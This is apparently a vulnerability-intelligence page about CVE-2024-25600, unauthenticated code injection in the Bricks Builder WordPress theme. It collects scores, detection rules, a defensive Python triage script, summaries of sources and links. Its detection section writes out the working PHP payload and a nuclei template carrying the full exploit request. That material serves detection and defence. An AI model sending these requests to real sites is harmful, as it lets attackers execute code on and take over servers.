CVE-2024-25600
Published: 2024-06-04
CVE-2024-25600: Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection. This issue affects Bricks…
Priority: P195 · critical · 10 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 87.45% (99.7th percentile)
Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection. This issue affects Bricks Builder: from n/a through 1.9.6.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codeer_limited | bricks_builder | n/a – 1.9.6 | — |
Detection & IOCs (extracted from sources)
path: /wp-content/themes/bricks/
command: ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt"; flow:established,to_server; http.request_line; content:"POST|20 2f|wp|2d|json|2f|bricks|2f|v1|2f|render|5f|element|20|"; fast_pattern; http.request_body; content:"postId"; content:"nonce"; content:"useQueryEditor"; content:"queryEditor"; reference:url,github.com/Chocapikk/CVE-2024-25600/; reference:cve,2024-25600; classtype:misc-attack; sid:2051020; rev:2; metadata:affected_product Wordpress_Plugins, attack_target Client_Endpoint, tls_state TLSEncrypt, created_at 2024_02_21, cve CVE_2024_25600, deployment Perimeter, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Wordpress, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_02_22, reviewed_at 2024_11_06;)
nuclei template
id: CVE-2024-25600
http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"postId": "1","nonce": "{{nonce}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);","objectType": "post"}}}}
    matchers:
      - type: regex
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
- The exploit requires a two-step process: first retrieve the nonce from the homepage JSON block (var bricksData), then POST to /wp-json/bricks/v1/render_element with the nonce and a malicious queryEditor payload.
- The exploit payload is delivered as a JSON POST body containing the fields postId, nonce, element.name, element.settings.hasLoop, element.settings.query.useQueryEditor and element.settings.query.queryEditor. Detection should look for the four body keywords the ET rule uses (postId, nonce, useQueryEditor, queryEditor) together, not for any one of them alone.
- Post-exploitation activity includes disabling security plugins such as Wordfence and Sucuri; monitor for unexpected deactivation of these plugins after exploitation.
- The Nuclei template extracts the nonce via the regex 'nonce":"([0-9a-z]+)' from the homepage response body; in web logs, the corresponding reconnaissance sequence is an unauthenticated GET / shortly followed by a POST to the render_element endpoint.
- The Snort/ET rule requires TLS decryption (SSLDecrypt deployment) to inspect the POST body, as the exploit typically occurs over HTTPS.
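As an added example (not code from this page, the ET rule, or any of the linked projects), the following Python applies the ET rule's four-keyword logic and a stricter JSON-structure check to constructed request records; the (method, path, body) record layout, the nonce value and the PHP_CODE_PLACEHOLDER string are assumptions, and no real payload is included.

```python
import json

# Endpoint and body keywords mirrored from the ET rule quoted on this page (sid 2051020).
RENDER_ENDPOINT = "/wp-json/bricks/v1/render_element"
BODY_KEYWORDS = ("postId", "nonce", "useQueryEditor", "queryEditor")


def matches_et_rule(method, path, body):
    """Cheap check mirroring the ET rule: POST to the render endpoint with all four keywords."""
    if method != "POST" or path != RENDER_ENDPOINT:
        return False
    return all(keyword in body for keyword in BODY_KEYWORDS)


def query_editor_enabled(body):
    """Stricter check: parse the JSON and require useQueryEditor plus a non-empty queryEditor."""
    try:
        query = json.loads(body)["element"]["settings"]["query"]
        return query.get("useQueryEditor") in (True, "true") and bool(query.get("queryEditor"))
    except (ValueError, TypeError, KeyError, AttributeError):
        return False  # malformed body or not exploit-shaped


def triage(requests):
    """Return (index, reasons) for records that look like CVE-2024-25600 attempts."""
    hits = []
    for index, (method, path, body) in enumerate(requests):
        reasons = []
        if matches_et_rule(method, path, body):
            reasons.append("et-rule")
        if method == "POST" and path == RENDER_ENDPOINT and query_editor_enabled(body):
            reasons.append("query-editor")
        if reasons:
            hits.append((index, reasons))
    return hits


def exploit_shaped_body(use_editor, code):
    """Constructed body in the field layout the page describes (placeholder instead of PHP)."""
    return json.dumps({"postId": "1", "nonce": "0123456789", "element": {
        "name": "container", "settings": {"hasLoop": "true", "query": {
            "useQueryEditor": use_editor, "queryEditor": code, "objectType": "post"}}}})


# Constructed sample records (method, path, body); only indexes 1 and 4 should be flagged.
SAMPLE_REQUESTS = [
    ("GET", "/", ""),                                                      # homepage visit
    ("POST", RENDER_ENDPOINT, exploit_shaped_body(True, "PHP_CODE_PLACEHOLDER")),
    ("POST", RENDER_ENDPOINT, json.dumps({"postId": "1", "nonce": "0123456789",
                                          "element": {"name": "container", "settings": {}}})),
    ("POST", "/wp-json/wp/v2/posts", exploit_shaped_body(True, "PHP_CODE_PLACEHOLDER")),
    ("POST", RENDER_ENDPOINT, exploit_shaped_body(False, "")),             # keywords present, editor off
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_REQUESTS):
        print(f"record {index}: flagged by {', '.join(reasons)}")
```

Record 4 shows why the keyword match alone is noisy: all four strings are present, but the structured check sees useQueryEditor off and an empty editor, so it stays quiet.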
CVSS provenance
NVD: v3.1 10.0 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
VulnCheck: 10.0 CRITICAL
GHSA
GHSA-4rxr-g7cg-rwg8: Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection
ghsa_unreviewed · 2024-06-04 · CVE-2024-25600 [CRITICAL] · CWE-94
Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection. This issue affects Bricks Builder: from n/a through 1.9.6.
VulnCheck
Bricks Builder Theme unauthenticated RCE in prepare_query_vars_from_settings
vulncheck · 2024 · CVSS 10.0 · CVE-2024-25600 [CRITICAL]
Remote Code Execution vulnerability in Bricks Builder Theme prepare_query_vars_from_settings function
Affected: Bricks Builder Theme
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme/
- https://patchstack.com/articles/new-year-new-threats-q1-2025s-most-exploited-wordpress-vulnerabilities/
- https://app.crowdsec.net/cti/cve-explorer/CVE-2024-25600
- https://www.loginsoft.com/reports/annually/vulnerability-intelligence-report-2025
- https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=C
Suricata
ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt
suricata · 2024-02-21 · CVSS 10.0 · CVE-2024-25600 [CRITICAL]
Rule: sid:2051020 rev:2, quoted in full under Detection & IOCs above.
Metasploit
Unauthenticated RCE in Bricks Builder Theme
metasploit
This module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval() function usage within the theme. Successful exploitation allows for full control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.
Nuclei
Unauthenticated Remote Code Execution – Bricks <= 1.9.6
nuclei · CVSS 10.0 · CVE-2024-25600 [CRITICAL]
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE), which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
Template:
id: CVE-2024-25600
info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building Wor
CTF
tryhackme-rooms / tryhack3mbricksheist
ctf_writeups · CVSS 10.0 · CVE-2024-25600 [CRITICAL]
# TryHack3M: Bricks Heist
https://tryhackme.com/r/room/tryhack3mbricksheist
Part of the 3mil challenge, rated Easy
This walkthrough won't cover the whole room, just the first portion where you are exploiting a CVE. I wanted to show how to do it without python.
The CVE is CVE-2024-25600, an unauthenticated remote code execution vuln in the Bricks WordPress theme, pretty nasty stuff. There is an excellent public exploit for this here, written in Python: https://github.com/Chocapikk/CVE-2024-25600
I personally hate Python because of its dependency hell nonsense. Here in particular, as I was using the THM attack box, which doesn't have the Python 3.10+ required for the above, I couldn't just clone and use the exploit.
However! It is trivial to exploit this vulnerability by hand! There are only
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio · 2025-02-26 · CVSS 9.8 · [CRITICAL]
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys · 2025-02-25
## Table of Contents
- Know Your Enemy's Playbook
- Attackers Move Fast
- How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Bleepingcomputer
Hackers exploit critical RCE flaw in Bricks WordPress site builder
blogs_bleepingcomputer · 2024-02-19 · CVSS 10.0 · [CRITICAL]
By Bill Toulas
Hackers are actively exploiting a critical remote code execution (RCE) flaw impacting the Bricks Builder Theme to run malicious PHP code on vulnerable sites.
The Bricks Builder Theme is a premium WordPress theme described as an innovative, community-driven visual site builder. With around 25,000 active installations, the product promotes user friendliness and customization in website design.
On February 10, a researcher named ‘snicco’ discovered a vulnerability, currently tracked as CVE-2024-25600, that impacts the Bricks Builder Theme installed with its default configuration.
The security issue is due to an eval function call in the ‘prepare_query_vars_from_settings’ function, which could allow an unauth
References
- https://github.com/Chocapikk/CVE-2024-25600
- https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
- https://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme?_s_id=cve
- https://patchstack.com/database/vulnerability/bricks/wordpress-bricks-theme-1-9-6-unauthenticated-remote-code-execution-rce-vulnerability?_s_id=cve
- https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6